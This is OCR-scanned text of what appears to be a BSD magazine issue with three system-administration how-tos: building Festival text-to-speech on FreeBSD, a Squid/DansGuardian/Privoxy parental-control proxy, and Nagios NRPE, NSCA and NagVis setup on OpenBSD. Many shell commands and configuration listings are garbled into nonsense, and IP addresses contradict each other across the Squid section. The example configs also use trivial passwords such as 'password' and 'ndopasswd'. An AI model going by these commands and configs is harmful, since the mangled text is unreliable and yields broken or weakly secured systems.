Figure 3. Commenting out unneeded lines 66-68 and 78-80 
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tar Zxvi Testiveal—-2.0.95-bete. tar.gz 
cd festival 
./configure 


gmake 


After successfully compiling festival source unpack the 
remaining required packages: 


tart: xvi -testlex CMU star.gZ 
tar Z2xvt festlex POSLEX.tar,gz 
tar Z2xvi. Testvox kallpelok.tar.gz 


The above will install necessary lexicon and voice files 
into (speech_tools) directory. 


References 


¢  http://www.cstr.ed.ac.uk/projects/festival/ — Official Festival site 

-  http://festvox.org/festival — Festival 2.0.95 source download site 

-  http://www.freebsd.org/ports/index.html — Lame 3.98.4 MP3 
encoder 

-  http://bobchatter.com — Bob Chatter Mobile IM|Chat 
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Figure 4. Testing Festival Installation, Installing Lame and text to 
voice conversion 
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__ dango works great 
vawcetill thara dawg? 


me ; 

dango’! still here dude 

iphone hal UP chat2voice 

bobchenene oo! background 
images 


dango nothing at beach now 


Figure 5. Cool implementation of text to voice technology in Bob 
Chatter IM Mobile App 


For speech_tools to successfully compile | had to 
(disable) the following lines. In your path directory speech 
tools/audio/linux sound.cc Comment out line 66-68 and 78- 
80 as shown in Figure 3. 


Testing your Installation 

After all the previous steps have been completed the killer stuff 
begins, testing your installation Figure 4. Run your favorite 
editor and create hello.txt with whatever text and save. Run 
the following command ./text2wave hello.txt. -o hello.wav 
on a successful install a hello.wav file will be created. Since 
.wav files are huge compared to .mp3 encoded files, | will 
install Lame /usr/ports/audio/lame. Once lame make install 
clean is successful, run the following command 1ame hello.wav 
hello.mp3 within YOUF festival/bin directory. 

In the last screenshot of Figure 4 you will notice the 
size difference between the hello.wav and hello.mp3 file. 
Cheers to Lame! 

Having read this tutorial you will have a successful 
installation of the latest Festival on FreeBSD and a great 
starting point for implementing voice technology into some 
very cool applications or services. One such example is 
the Chat2Voice in the Bob Chatter mobile app Figure 5. 
Chat2Voice converts real-time chat into voice files. 


DIEGO MONTALVO 

Diego Montalvo is a web/ mobile application developer which 
has developed some interesting concepts. Diego currently 
resides in Brownsville, Texas but finding his way back to sunny 
San Diego California. Next tutorial will be written from the 
beach! Great day for a cold pint of Guinness! Enjoy the tutorial. 
Feel free to contact Diego at diego@earthoid.com 
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Squid proxy with Parental Controls How-To 


Traditionally, web pages were served via a webserver such 
as Apache and transmitted via the network on port 80 to 


a web-browser. 


What you will learn... 
¢ How to install a Squid proxy with parental controls 


hile pages and content were cached in the 
VAY dee browser cache, on larger networks it 

made sense to use a caching proxy such 
as Squid to reduce external traffic over the net for 
frequently fetched pages such as Google. This also 
improved the response of the local network, as traffic 
only had to reach the local cache to retrieve popular 
pages. Often, ISP's use other caches on the internet 
to shape the flow of traffic and certain countries use 
a combination of firewalls and proxies with exclusion 
lists to limit the content delivered to their citizens. This 
can also be used in reverse, and a competent user 
can use another proxy elsewhere on a non-standard 
port thereby bypassing the original content filter. It 
is therefore important to lock down the network and 
monitor for any strange activity when content filtering, 
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Figure 1. Squid setup Screen on Webmin 
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What you should know... 
- How to perform a clean FreeBSD install and configure networ- 
king 


unless deep packet inspection is used which is not 
always practical. 

There are a number of ways of configuring Squid to 
intercept port 80 traffic , as a stand-alone proxy, or as 
a transparent proxy. In the former scenario, for all traffic 
to pass through the proxy each client must be configured 
to use Squid, which on large networks with many 
clients can be time consuming if it is not centralised 
e.g. by using a proxy.pac file. This method also had the 
drawback that the user can disable the proxy settings, 
and if the network is not secure, any HTTP traffic will 
then leave unmonitored via the default gateway. A better 
solution would be to use Squid in transparent mode, and 
to redirect all port 80 traffic to the proxy. This also has 
disadvantages, in that the proxy will need to have dual 
network interfaces and the network router/firewall will 
have to be reconfigured to redirect all port 80 traffic to 
the Squid box. As this How-to was inspired by locking 
down my home network for my daughter, | have gone for 
the former method but there is no reason Squid could 
not be adapted to be a transparent proxy — all would be 


Squid executable 

Full path to PID file 

Full path to squid cache directory 
Squid cachemgr.cgi executable 


Full path to squid log directory 


usrlocal/sbin/squid 


usr/local/squid/logs/squid.pid 


var/squid/cache 


usrlocal/libexec/squid/cachemgr.cgi 


var/squid/logs 


Figure 2. Squid module config screen on Webmin 


FreeBSD Squid proxy with Parental Controls How-To 


required is to add firewall support to the FreeBSD kernel 
and IPFW/PF transparent support for Squid. Some 
additional tuning would be required to pass the traffic 
through DansGuardian and Privoxy after Squid, but the 
principle would remain the same. 

We will be using DansGuardian and Privoxy for content 
filtering. DansGuardian is free to use in a personal, 
government or educational environment, but a licence 
needs to be purchased for commercial use. If a totally 
free solution is preferred, SquidGuard could be used 
instead. Webmin is very useful as it will allow us to view 
cache statistics via a browser, and easy add restrictions to 
Dansguardian if desired. 

For this demo, | will be using FreeBSD 8.1 i386. 


Installing FreeBSD 
Proceed with a standard FreeBSD install and install the 
ports tree, configure networking using a static IP address, 
add a user account in the wheel group and install any 
utilities and patches that you favour, such as Midnight 
Commander (mc) and portaudit etc. 

In this install, the IP address of transproxy (transproxy.m 
erville.intranet) is 192.168.0.139. 


Install the packages 
As root: 


pkg add -r wget webmin squid privoxy 


Set up and follow the prompts from the script then start 
Webmin: 


/usr/local/lib/webmin/setup.sh 


/usr/local/etc/rce.d/webmin onestart 
Create the squid cache directories and start Squid: 


just] local/sbin/ squid =z 


/usr/local/etc/re.d/squid onestart 
Add the following to your hosts file : 


192.166.0139 -Cranseroxy transproxy.merrville.intranet 


Configuring Squid 
Login to webmin on port 10000 and browse to Servers/ 
Squid Proxy Server: see Figure 1. 

Amend the paths in Module Config to the following: see 
Figure 2. 

Open a browser, and use 192.168.0.139 port 3128 as 
the proxy. Add 192.168.0.139 to ignored hosts, and you 
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Ports and Networking Options 


Proxy addresses and ports Default (usually 3128) @ Listed below. 
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Figure 3. Squid Ports and Networking screen on Webmin 


should be able to freely browse the internet, and the traffic 
visible in /var/squid/logs/access.log. If you access the 
Cache Manager Statistics (username/password squid) 
and drill down to the Cache Client Lists you will also see 
the hit ratio etc. 


Installing DansGuardian 


mkdir /usr/ports/distfiles 

cd /usr/ports/distfiles 

wget http://dansguardian.org/downloads/2/Stable/ 
dansguardian-2Z.j0.1.l.tar.gz 

cd /usr/ports/www/dansguardian 


make install clean BATCH=YES 


Browser HTTP Data flow using multiple filters 


\ 


Privoxy 
Nuisance Ads 


i 
a 


Web content 


Figure 4. Data flow through the proxy 
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Location: Defauit =v 


Proxy Configuration {ignored Hosts 


Direct internet connection 


*) Manual proxy configuration 


Use the same proxy for all protocols 


HTTP proxy: | 192.168.0.139 


Secure HTTP proxy: 


FTP proxy: 


Socks host: 


Automatic proxy configuration 


Figure 5. Client browser proxy settings 


If you require extensive control over DansGuardian, 
download the DansGuardian Webmin module from 
sourceforge.net and install via the Webmin Modules 
link. You will have to modify the paths and directory 
permissions to reflect the FreeBSD install. 

Tune the 
configuration file: 


/usr/local/etc/dansguardian /dansguardian 


fiilterip = 197.168.0.139 

filterport = 3129 

proxyip = 192.166.0.139 

proxyport = 8118 

daemonuser = 'nobody' 

daemongroup = 'nobody' 

Loglecation = "/var/log/dg. log" 
statlocation = '/var/log/dg.stats' 
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Figure 6. Squid log 
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263b1446 Header: : X-XSS-Protection: 1; mode=block 


283b1446 Header: scan: X-Cache: MISS from transproxy.merville.intranet 
283b1440 Header: scan: Via: 1.6 transproxy.merville.intranet:3128 (squid/2.7.STABLE9) 
283b1446 Header: scan: Connection: close 
283b0T46 Header: scan: GET http://www. playboy.com/ HTTP/1.8 
283b8T40 Header: scan: Host: www.playboy.com 
283b0f40 Header: scan: Proxy-Connection: keep-alive 
: Scan: User-Agent: Mozilla/5.6 (X11; U; Linux x86 64; en-US) AppleWebKit/533.4 (KHTML, Like Gecl 


7:34:25. 283b8746 Header: scan: Accept: application/xml, application/xhtml+xm1, text/html; q=6.9, text/plain; q=0.8, image/png 


2:34:25. 263b8T46 Header: scan: Accept-Encoding: identity,gzip,deflate 
2:34:25. 283b0T48 Header: scan: Accept-Language: en-GB,en-US;q=6.8,en;q=0.6 
283b6T46 Header: scan: Accept-Charset: IS0-8859-1,utf-8;q=0.7,*;q=0.3 
283b8T46 Header: crumble crunched: Proxy-Connection: keep-alive! 
283b8f40 Header: Adding: Connection: close 
283b8f40 Header: New HTTP Request-Line: GET http://www.playboy.com/ HTTP/1.6 
283b8f48 Request: www.playboy 
283b6f48 Header: 
283b8T46 Header: 
283b8740 Header: 
283b0f46 Header: 
283b0f48 Header: 
283b0f40 Header: 
283b8F40 Header: 
283b60f48 Header: 
283b8f48 Header: 
283b8f40 Header: 
283b8T48 Header: 
283b8T46 Header: 
283b6T46 Header: 
283b0T40 Header: = 0 : GipServerfatwire-satelLite=369823916 . 368958000; path=/ 
283b6T46 Header: : Sun, 15 Aug 2010 13:34:26 GMT 
283b8T40 Header: t-Encoding 
283b8f48 Header: Encoding: gzip 
283b6f48 Header: 
283b6T48 Header: 
283b6T46 Header: = proxy.merville. intranet 
283b8f48 Header: : transproxy.merville.intranet:3128 (squid/2.7.STABLES) 
283b0T46 Header: : Connection: & 


domain=. pLayboy.com 
; domain=.playboy.com 


Figure 7. Privoxy log 


accessdeniedaddress = 'http://transproxy/cgi-bin/ 


dansguardian.pl' 


cd /var/log 

mkdir dg 

chown root:nobody dg 
chmod 770 dg 


/usr/local/etc/re.d/dansguardian onestart 


Modify Squid so it only listens on port 127.0.0.1:3128 see 
Figure 3. 


Open the fusr/ local /etc/ privoxy/ contig file and change the 
listen address to match the following: 


listen-address 192.168.0.139:8118 


3 GET 86 1 204 te mt - 
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prt.78, pprt.81,01.81,jsrt.496,iml.81 GET 66 1 264 text/html - 
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en&20Linux&q=bsd&200pen%20linuxk20&cp=15 GET 6@ 8 1 200 text/javascript - 
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36 1 206 text/javascript - 
610.8.15 13:34:24 - 192.168.0.126 http://clients1.qoogle.co.uk/complete/search?client=chrome&hl=en -GB&q=https3A%2F&2Fwww . 
T 58 @© 1 206 text/javascript - 
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Figure 8. DansGuardian log 
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Add a forward statement to push Privoxy's output 
through Squid 
127.0.0.1:3128 


forward / 


Comment out the debug lines so we can monitor the 
traffic: 


debug 1 

debug 1024 
debug 4096 
debug S192 


Add the following lines to rc.conf so all services will start 
on boot: 


squid enable="YES" 
privoxy enable="YES" 
dansguardian enable="YES" 


webmin enable="YES" 


Change the proxy on your client from port 3128 to 3129. 
Ensure everything starts OK: 


usr/local/etc/rc.d/squid onestop 
usr/local/etc/rce.d/dansguardian onestart 


usr/local/etc/rc.d/privoxy onestart 


/ 
/ 
/ 
/ 


usr/local/etc/rce.d/squid onestart 
In three separate terminals, view the outgoing traffic: 
tail -f /var/log/dg/dg.log 


tail -f /var/squid/logs/access.log 
tail -f /var/log/privoxy/logfile 


You should now have a cached, content filtered proxy 
with advert removal. Reboot the box. 


(Q) Prreceppetran rary 
a - 


2 iHome Hi @i5eam Coo een thelobboer._. 


Cen Ai Prireeany oy iy 2 > - 
Osher Booker 


This is Privoxy 3.0.16 on transproxy (192.168.0139), port 8118, enabled 


Privoxy Menu: 


+ Vorw dh change fhe curenloonigaaion 

+ Veen ihe sue onde worsen numbers 

© View he request hencees 

* Look up whieh action: apply te a URL and att 
+ Documeniston 


The Prvtory Teen values your hedbeck To pravide you wiih the beak suppor, we deh Pal poet: 
* use fhe Support Tracker if you mead help, 
+ OM Bs and coniguradon Mlaied problems wit the actor Ged tough fe Acionsile Feachace Teaches, 
= som bugs only through fhe Bug Tracker. Pease make sees thal he bug kes mod been submited yel 
* yom logiung roqreesis ony heowgh tho Foden Roques! Tackor. 
© reed Ghee breirecions in fee Leer Mur fo male meee you requ! oonbaiees all fhe inioereion we med 


[yOu WE i Rapport ee Privexy Taam, placa Rave a loon ati FAO bo lee heer io partespala o¢ to donate 


Figure 9. Privoxy GUI 
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Final testing and additional tweaks 
Checks: 


¢ Go to a site with lots of adverts. Most of these should 
be removed with Privoxy. Ensure noscript/adblock is 
turned off if you are running Firefox etc. 

¢ Go to a known bad site, e.g. playboy.com and ensure 
the content is filtered 

¢ Go to a known good site and ensure all content 
downloads OK. 


The following improvements would be beneficial: 


1. Lock down Privoxy so only Squid can access it — this 
can be done via the config file or using a firewall rule 

2. Automate the retrieval of the latest blacklists and 
phrase-lists from dansguardian and blacklist.org 

3. Add further ACL's to Squid to prevent access after 8: 
00 pm etc. on certain PC's 

4. Tune the exception lists / sensitivity of the proxies to 
your own taste. 

5. Handle HTTPS traffic better 


ROB SOMERVILLE 

Rob Somerville has been passionately involved with technology 
both as an amateur and professional since childhood. 
A passionate convert to *BSD, he stubbornly refuses to shave 
off his beard under any circumstances. Fortunately, his wife 
understands him (she was working as a System/36 operator 
when they first met). The technological passions of their 
daughter and numerous pets are still to be revealed. 
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Network monitoring 


So our OpenBSD-based network now includes redundant firewalls (http:// 
www.kernel-panic.it/openbsd/carp/index.html), domain name servers 
(http://www.kernel-panic.it/openbsd/dns/index.html), a mail gateway 
(http://www.kernel-panic.it/openbsd/mail/index.html) and a web proxy 
cache (http://www.kernel-panic.it/openbsd/proxy/index.html). 


What you will learn... 
- Installing Nagios 
¢ How to monitor network with Nagios and Open BSD 


ne of Nagios’ key features is its extensibility; new 
C) functionality can be easily added thanks to its 

plugin-based architecture, the external command 
interface and the Apache (http:/~Avww.kernel-panic.it/ 
openbsd/nagios/httpd.apache.org/) web server. In this 
chapter, we will take a look at a few common issues that 
can be addressed with some of the most popular addons 
(http://www.nagiosexchange.org/) for Nagios. 


NRPE 

Suppose you want Nagios to monitor local services on 
remote hosts, such as disk space usage, system load or the 
number of users currently logged in. These are not network 
services, so they can't be directly checked out with standard 
plugins: what we would need is some kind of agent to install 
on remote systems and that Nagios could periodically 
query for the status of local services. Well, that's exactly 
what the Nagios Remote Plugin Executor (NRPE Attp: 
//www.nagiosexchange.org/cgi-bin/page.cgi?g=Detailed/ 
1556.html;d=1) does: it allows you to execute local plugins 
on remote hosts! It is made up of two components: 


¢ an agent, running (either standalone or under ineta(s) 
http://www.openbsd.org/cgi-bin/man.cgi?query=inet 
d&sektion=8) on the monitored host, which waits for 
incoming connections, executes the requested checks 
and returns the status of the local services; 
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What you should know... 
¢- Agood knowledge of OpenBSD administration 
¢ Basic MySQL database administration 


¢ a plugin, check nrpe, used by Nagios to query the 
remote agents. 


Both the agent and the plugin are available from the 
following package: 


Nrpe-x «xs Xu gz 


In addition, the Nagios plugins package will be installed 
on the monitored host as a dependency: this will allow 
the NRPE agent to take advantage of the standard 
Nagios plugins to perform local checks. The package 
installation automatically creates the nrpe user and 
group that the daemon will run as and copy a sample 
nrpe.cfg Configuration file in /etc/: see Listing 16. To run 
NRPE as a standalone daemon, simply type: 


# /usr/local/sbin/nrpe -c /etc/nrpe.cfg -d 


and add the following lines to /etc/rc.local to start it 
automatically after reboot: 


/etc/rc.local/ 
if [ -x /usr/local/sbin/nrpe ]; then 

echo -n ' nrpe' 

/usr/local/sbin/nrpe -c /etc/nrpe.cfg -d 
nil 
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/etc/nrpe.cfg 

# The syslog facility that should be used for logging 
purposes 

Yoo tacility—daemnon 

# Path to the pid file (ignored if running uder inetd) 

pid file=/var/run/nrpe.pid 

# Address £o bind to, to avoid binding on all 
interfaces (ignored if running 

# under inetd) 

SetvVerecdddusse— li Loe U. 0 

# Port to wait connections on (ignored if running under 
inetd) 

Senven (eOut— 7006 

# User and group the NRPE daemon should run as (ignored 
if running under inetd) 

MeEpesiser— mre 

MNS Suc Limes 

# Comma-delimited list of IP addresses or hostnames 
that are allowed to connect 

# to the NRPE daemon (ignored if running under inetd) 

alowedeinesws—ilZ 0 Uni Ze hoe koe 

# Don't allow clients to specify arguments to commands 
that are executed 

dont blame nrpe=0 

# Uncomment the following option to prefix all commands 
with a specific string 

#command prefix=/usr/bin/sudo 

# Don't log debugging messages to the syslog facility 

debug=0 

# Maximum length (in seconds) of executed plugins 

command timeout=60 


4 Coninana CGelinibicns are in Ehe form 


# 

# command [<command_ name>]=<command_line> 

# 

# Thus, when the NRPE daemon receives a request to 

execute eEhe command 

7 Command tame" 7 eh will rune ehe “localt scrip 
Specimed Dy “command line”. 

# Note: macros are NOT allowed within command 
denna tions 

command |check wsers]—=/us1r/local/libexéc/nagios/check 
Uses wes) =e 10 

commana cheek load —/tisi/ local libexec/ magives/ciieck | 
Keele wel Seale one eee iw Oe) 

Commanc] eheck dusk! |—/ sit, local libexee/ magies, check | 


disk =w 20 =—c 10 -9 /dev/wd0a 


Listing 16. The package installation and copy asample configuration file 


command[check total procs]=/usr/local/libexec/nagios/ 


Check onoeo aw 0 e200 


Listing 17. Editing configuration file 


/etc/nsca.cfg 
# Path to the pid file (ignored if running under inetd) 
pid file=/var/run/nrpe.pid 


# Address to bind to (optional) 
Seb yeu seddwess—l 72.16.0514 
# POrt £0 Wale Conmections on 


Seuyer pOEi— 06) 


# User and group the NSCA daemon should run as (ignored 
if running under inetd) 
Misia WuUISeE = Maguos 


nsca_ group= nagios 


# chroot (2) directory for the NSCA daemon 


nsca_chroot=/var/www/var/nagios/rw 


# Don't log debugging messages to the syslog facility 
debug=0 


# Path to the command file (relative to the chroot 
directory) 

commana tile=nagios. end 

# File where to dump service check results if the 
command file does not exist 


alternate cump tfle-nscea. dump 


# Do not aggregate writes to the external command file 
EggBecave witbes—) 
# Open the external command file in write mode 


apeencd tommle—0 


# Maximum packet age (in seconds) 


Max packeu age—2) 


# Password to use to decrypt incoming packets 

password=password 

# Decryption method (16 = RIJNDAEL-256). It must match 
the encryption method 

# used by the client 

decryerl on merhod—16 
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Alternatively, you can run NRPE under inetacs) (hAttp:// 
www.openbsd.org/cgi-bin/man.cgi?query=inetd&sektion 
=8) by adding the following line in /etc/inetd.cont (8) (Attp:// 
www.openbsd.org/cgi-bin/man.cgi?query=inetd.cont&se 
ktion=8): 


/etc/inetd.conf 


nrpe stream tcp wait _nrpe: nrpe /usr/ 


local/sbin/nrpe nrpe -c /etc/nrpe.cfg -i 

and by adding the nrpe Service IN /etc/services(5) (http:/ 
/www.openbsd.org/cgi-bin/man.cgi?query=services&se 
ktion=5): 


/etc/services 


nrpe 5666/tcp # Nagios Remote Plugin Executor 
and then send the inetas) (http:/www.openbsd.org/ 
cgi-bin/man.cgi?query=inetd&sektion=8) daemon the 


hangup signal, instructing it to re-read its configuration: 
# pkill -HUP inetd 


Now, on the Nagios server, you can perform checks 
using NRPE simply by defining commands such as 
the following (only make sure that the command name 
passed to the -- option has a corresponding command 
definition in the nrpe.cfg file on the remote host!): 


/var/www/etc/nagios/commands.cfg 

define command { 
command name check-diskl-nrpe 

SUSER15/check nrpe -H SHOSTADDRESSS -c 


cheek. diskl 


command line 


} 


NSCA 

Now suppose you want to monitor the correct execution 
of a process on a remote host, like a scheduled backup or 
a crontab job. This is still a /oca/ service, but, unlike disk 
space usage or system load, it would probably sound more 
logical to make it the responsibility of the job itself to notify 
Nagios of its exit status. That's the perfect job for the Nagios 
Service Check Acceptor (NSCA), which is a daemon 
program, meant to run on the Nagios server, designed to 
accept passive service check results from clients. 

NSCA is similar to NRPE in that it is made up of 
a daemon process and a client application, but now 
the roles are inverted: the daemon process runs on the 
Nagios server while remote hosts use the send _nsca utility 
to communicate their status to the daemon. NSCA then 
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forwards the check results to Nagios through the external 
command interface (so make sure you have enabled 
external commands in the main configuration file). 


Server configuration 

NSCA can run either as a standalone daemon or under 
ineta(s) (Attp:/vwww.openbsd.org/cgi-bin/man.cgi?query=i 
netd&sektion=8). To install the server component we need 
to add the following packages on the Nagios server: 


= mhieshioxn. cog z 


LiIbMneGrypU=x1s7k.0gZ 


° ‘nNsca-x.x.tozZ 


Next, we need to edit the /etc/nsca.ctg Configuration file: 
see Listing 17. You should set restrictive permissions (600) 
on the configuration file in order to keep the decryption 
password protected. To run NSCA as a standalone 
daemon, simply type: 


# /usr/local/sbin/nsca -c /etc/nsca.cfg 


and add the following lines to /etc/rc.iocai to Start it 
automatically after reboot: 


/eto/ro.local 
if [| -x /usr/local/sbin/nsca ]; then 
echo =<n * neca' 


/usr/local/sbin/nsca -c /etc/nsca.cfg 


Alternatively, you can run it~ under — ineta(s) 
(http://www.openbsd.org/cgi-bin/man.cgi?query=inetd&s 
ektion=8) by adding the following line in /etc/inetd.con£ (8) 
(http://www.openbsd.org/cgi-bin/man.cgi?query=inetd.c 
onf&sektion=8): 


/etc/inetd.conf 


nsca Stream. cp wait _nagios: nagios /usr/ 


local /sbin/nsca nsca -c /etc/nsca.cfg --inetd 

and by adding the nsca service in /etc/services(5) (Attp:// 
www.openbsd.org/cgi-bin/man.cgi?query=services&sek 
tion=5): 


/etc/services 


nsca 5667 / tcp # Nagios Service Check Acceptor 
and then send the inetas) (http:/www.openbsd.org/ 
cgi-bin/man.cgi?query=inetd&sektion=8) daemon the 


hangup signal, instructing it to re-read its configuration: 
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Listing 18. The database creation script 


# cp /usr/local/share/mysgl/my-medium.cnf /etc/my.cnf 

¢ /Usr/10cal/bin/mysG) anstali dp 

Pees. 

# mysqld safe & 

Starting mysqld daemon with databases from /var/mysql 

¢ 7 Web) Iecal/bin7myeq! (secure anecallacion 

eel 

Enter current password for root (enter for none): 
<eMrer 

rea 

Set root password? [Y/n] Y 

New password: root 

Re-enter new password: root 

ete 

Remove anonymous users? [Y/n] Y 

eer al 

Disallow root login remotely? [Y/n] Y 

LOeeasa | 

Remove test database and access to it? [Y/n] Y 

lees 

Reload privilege tables now? [Y/n] Y 

erern| 

# mysql =u root =p 

Password: LOor 

Welcome to the MySQL monitor. Commands end with ; or 
Nee 

Server version: 5.0.5la-log OpenBSD port: mysql-server- 


Sa ole: 


Type “help; ' or ’\h” fox help. Type '\c' to clear the 
buffer. 


mysql> create database nagios; 


Query OK, 1 row affected (0.02 sec) 


mysql> use nagios; 

Database changed 

mysql> \2 -db/mysql asa 

paren 

mysql> GRANT SELECT, INSERT, UPDATE, DELETE ON nagios.* 
TO "ndouser”G' localhost” IDENTIFIED 
BY "ndopasswd*; 

mysql> \G 


Listing 19. Editing the NDOMOD configuration file 


/var/www/etc/nagios/ndomod.cfg 
instance nName-derauly 
SUL CUIL ey pe — Uni xsoeke: 


output=/var/nagios/rw/ndo.sock 


Cubput DuEren a temns—5000 


buffer file=/var/nagios/rw/ndomod. tmp 


DiS LOtarlon interval —Taa00 


HS TCO oOne ~lneoule—o)) 


HEECONNEEE SIN terval ——5 
ceCOnMOeE We cadig | imrermva l= > 
data erocessing opt lons——1 


Contig OULPULL Oe lens— 2 


Listing 20. The NDO2DB configuration file 


/var/www/etc/nagios/ndo2db.cfg 
lock file=/var/run/nagios/ndo2db.lock 


NndoZcb wiser — agile 


ndeZdb group— Nagios 


SCCke eet pe-untx 


socket_name=/var/www/var/nagios/rw/ndo.sock 


diy servertyoe-—mysql 
dbyhest=Vocalnost 
db pOne 5506 

dbo name=nagios 

db prenx—fag tos ) 

db VUser—ndouse: 


do pass=ndopasswd 


max timedevents age=1440 
max systemcommands age=10080 
Max Serv icechocks age—10060 


ax Nes eeneeks vage—1008) 


max eventhandlers age=44640 

debug level—0 

debucn VereostEy =| 

debug _ file=/var/www/var/log/nagios/ndo2db.debug 
Max debug mls oilnze—h)OO000 
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# pkill -HUP inetd 


Client configuration 
On the client side, we need to install the following 
packages: 


* tm@hash=x.k.s.t¢7 


Ia Dinar ypr- xs. x cg2 


* wnsca-client-x.x.tgz 


and edit the encryption parameters in the /etc/send _ 
nsca.cfg configuration file: 


/etc/send nsca.cfg 

# Password to use to encrypt outgoing packets 
password=password 

# Encryption method (16 = RIJNDAEL-256) 
encryption method=16 


The send nsca utility reads data from standard input and 
expects, for service checks, a tab separated sequence 
of host name, service description (i.e. the value of the 
service description directive in the service definition), 
return code and output; e.g.: 
echo "wwwl\tbackup\t0\tBackup completed successfully" | \ 
/usr/local/libexec/nagios/send_nsca -H nagios.kernel- 


Paha. 


and, for host checks, a tab separated sequence of host 
name, return code and output; e.g.: 


echo “routerl\t2\tRouter #1 is down” | /usr/local/libexec/ 
nagios/send nsca -H \ 


nagios.kernel-panic.it 


You can override the default delimiter (tab) with sena_ 
nsca's -d Option. Now, if everything is working fine, each 
message received by the NSCA daemon should produce 
a line like the following in the Nagios log file: 


/var/www/var/log/nagios/nagios.log 
[1167325538] EXTERNAL COMMAND: PROCESS SERVICE CHECK RE 
SULT; wwwl;backup;0;Backup completed successfully 


NagVis and NDO 

NagVis is a visualization addon for Nagios; it can be used 
to give users a graphical view (http:/www.nagvis.org/ 
doku.php?id=screenshots) of Nagios data. It requires the 
installation of PHP (http:/www.kernel-panic.it/openbsd/ 
nagios/www.php.net/) and a few libraries: 
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La Dx S23 ge 

jad Rolls aay are ary, ary 057 
jJpeg-x.tgz 

PuG=s.2.2-0902 
php5-core=x.x%.x.tgzZ 
phpos-qd-=x.x.x-—no -xillsigz 
mysql=client=x.x%.*k.lgz 


phpS-mysql-x.x.x.tg2z 


Apache is already up and running, so we only need to 
enable the php modules we have just installed: 


# In -s /var/www/conf/modules.sample/php5.conf /var/www/ 
conf/modules 

# In -fs /var/www/conf/php5.sample/gd.ini /var/www/conf/ 
php5/gd.ini 

# In -fs /var/www/conf/php5.sample/mysql.ini /var/www/ 
conf/php5/mysql.ini 


uncomment the following line in /var/www/conf/httpd.conf: 


/var/www/conf/httpd. conf 
AddType application/x-httpd-php .php 


and restart Apache: 


# apachectl restart 


/usr/sbin/apachectl restart: httpd restarted 


Installing NDO and MySQL 

Prior to version 1.0, NagVis was able to pull data from Nagios 
directly from its web interface; now this is not supported 
anymore and NagVis expects monitoring data to be stored 
in a MySQL database, thus requiring the intallation of the 
Nagios Data Output Utils (NDOUTILS) addon. 

The NDOUTILS addon allows you to export current 
and historical data from one or more Nagios instances to 
a MySQL database, thus providing the interface between 
Nagios and MySQL. This addon consists of several parts, 
but we will need only two of them: 


¢ the NDOMOD event broker module, which is loaded 
by Nagios at startup and dumps all events and data 
from Nagios to a Unix or TCP socket; 

¢ the NDO2DB daemon, which is a standalone daemon 
and reads the output produced by the NDOMOD 
module through the Unix or TCP socket and dumps it 
into the database. 


First off, we need to install MySQL; the following is the 
list of the required packages: 
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Listing 21. The NDO2DB configuration file 


/var/www/nagios/nagvis/etc/nagvis.ini.php 


, —<splip veturn 1)" 27> 


[global | 

language = eo JUS" 
refreshtime = 60 

dateformat wey tO vol abeaietey 
[defaults] 

backend =— odomy iy 


- Detault eons’ “saze (acons can be found an 


; /var/www/nagios/nagvis/images/iconsets) 


LEONS SS S1Ol jit elibohi 
recognizeservices = ] 
onlyhardstates = 0 
backgroundcolor = "fff" 
Comex tment = 1 
eventbackground = 0) 
eventhighlight = ] 


eventhighlightduration = 10000 
eventhighlightinterval = 500 
eventlog = 0 
eventloglevel = "info" 


eventlogheight = 75 


eventloghidden = 1 
eventscroll = 1 


eventsound ee 


headermenu = 1 
headertemplate = "default" 
hovermenu = 1 
hovertemplate = "default" 
hoverdelay = 0 
hoverchildsshow = 1 
hoverchildslimit = 10 


hoverchi ldsorder — ase” 


hoverchildssort = "3s" 

Leons = Se bd Medium: 
onlyhardstates = 0 

recognizeservices = ] 

showinlisis = 1 

Wied je ence Se =n oodn® 

hosturl = 
"Thtmlcgi]/status.cgi?host=[host name]” 
hestgroupurl = 

"(htmlcgi] /status.cgi?hostgroup=[hostgroup name]" 
serviceurl = "(htmlcgi]/extinfo.cgi?type=2 
(Mest — (heel Mame laseryice-|serv ice deseriprlen| = 
servicegroupurl =" |himlega |i status cgi? 


Serv leeduelp— (| seby uceqrelpenale (scr yle-deranml: 


[wul | 

autoupdatefreq = 25 

maplocktime = 5 
allowedforconfig = nagiosadmin 
[paths] 

base = "/nagios/nagvis/" 
htmlbase = "/nagios/nagvis" 
htmbegi = '/cgl-Din/ nagivos” 
[index] 

backgroundcolor = #f£ff 
cellsperrow = 4 

headermenu = 1 

headertemplate = "default" 
showrotations = 1 

[automap | 

defaultparams = "&maxLayers=2" 
showinlists = 0 

[worker | 

interval = 10 
requestmaxparams = 0 
requestmaxlength = 1900 
updateobjectstates = 30 

[backend ndomy 1] 

backendtype = "ndomy" 

dbhost Se OD eele® 
dbport = 3306 

dbname = "nagios" 

ebuser =) Ndouser 

dbpass = "ndopasswd" 
dbprefix = sae lepikes |! 
dbinstancename = "default" 
maxtimewithoutupdate = 180 

hemikega =) 4) cgu-bim/ Meaqhos™ 


; In this example, the browser switches between the 
"dmz' and 'lan" maps every 

; 15 seconds. The rotation is enabled by specifying 
the URL: 

> https: 7 / your, nagios.server/ nagios/ maqvils/ 
index.php?rotation=kp 

[wotation: ke 

maps =" omz, ban 


i 


II 


interval 
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po-Net-Daemon-x.x.tgz 
* (65-PIRPC=x. x. tg2 
bo-DBI-s.e.cgzZ 
po-DEBR=mysqil=2.%.tgz 


mysql-server-x.x.x.tgz 
Next, we need to download 


compile the NDOUTILS tarball: 


+ bar “zeyt ndoutils-x.x.x. tar.gz 


[ ee? J 


(http://sourceforge.net/ 
project/showfiles.php?group_id=26589), 


extract 


HOW TO’S 


and 


# cao ndoutils=x.x.x 

# ./configure --disable-pgsql --enable-mysgql --with-mysql- 
lib=/usr/local/lib \ 

>  --with-mysgql-inc=/usr/local/include 

[aca 


# make 


Note: if maxe fails to compile the adbnandiers.c file, try 
installing this patch (http://www. kernel-panic.it/openbsd/ 
nagios/ndo-openbsd.patch applies to version 1.4b9) by 
running the following command from outside the ndoutils 
source tree: 


# other objects 
define global { 


interface 


Peonset—sta edu um 
# Background image 
map image=dmz.png 


} 


define host { 


host _name=wwwl 


X=268 
y=166 


# of its services 
Becoqmuze goeky wees —( 


} 


web server 
define service { 
host_name=wwwl 
service description=Wwww 
x=588 
y=165 


allowed for config=nagiosadmin 


# Display the status of the 'WWW' 


Listing 22. A sample map configuration 


/var/www/nagios/nagvis/etc/maps/dmz.cfg 


will be inherited by all 


# List of users allowed to view this map 


allowed User—=nagilesacmin, Gperator 


main configuration file) 


# Display the status of our 'wwwl' web server 


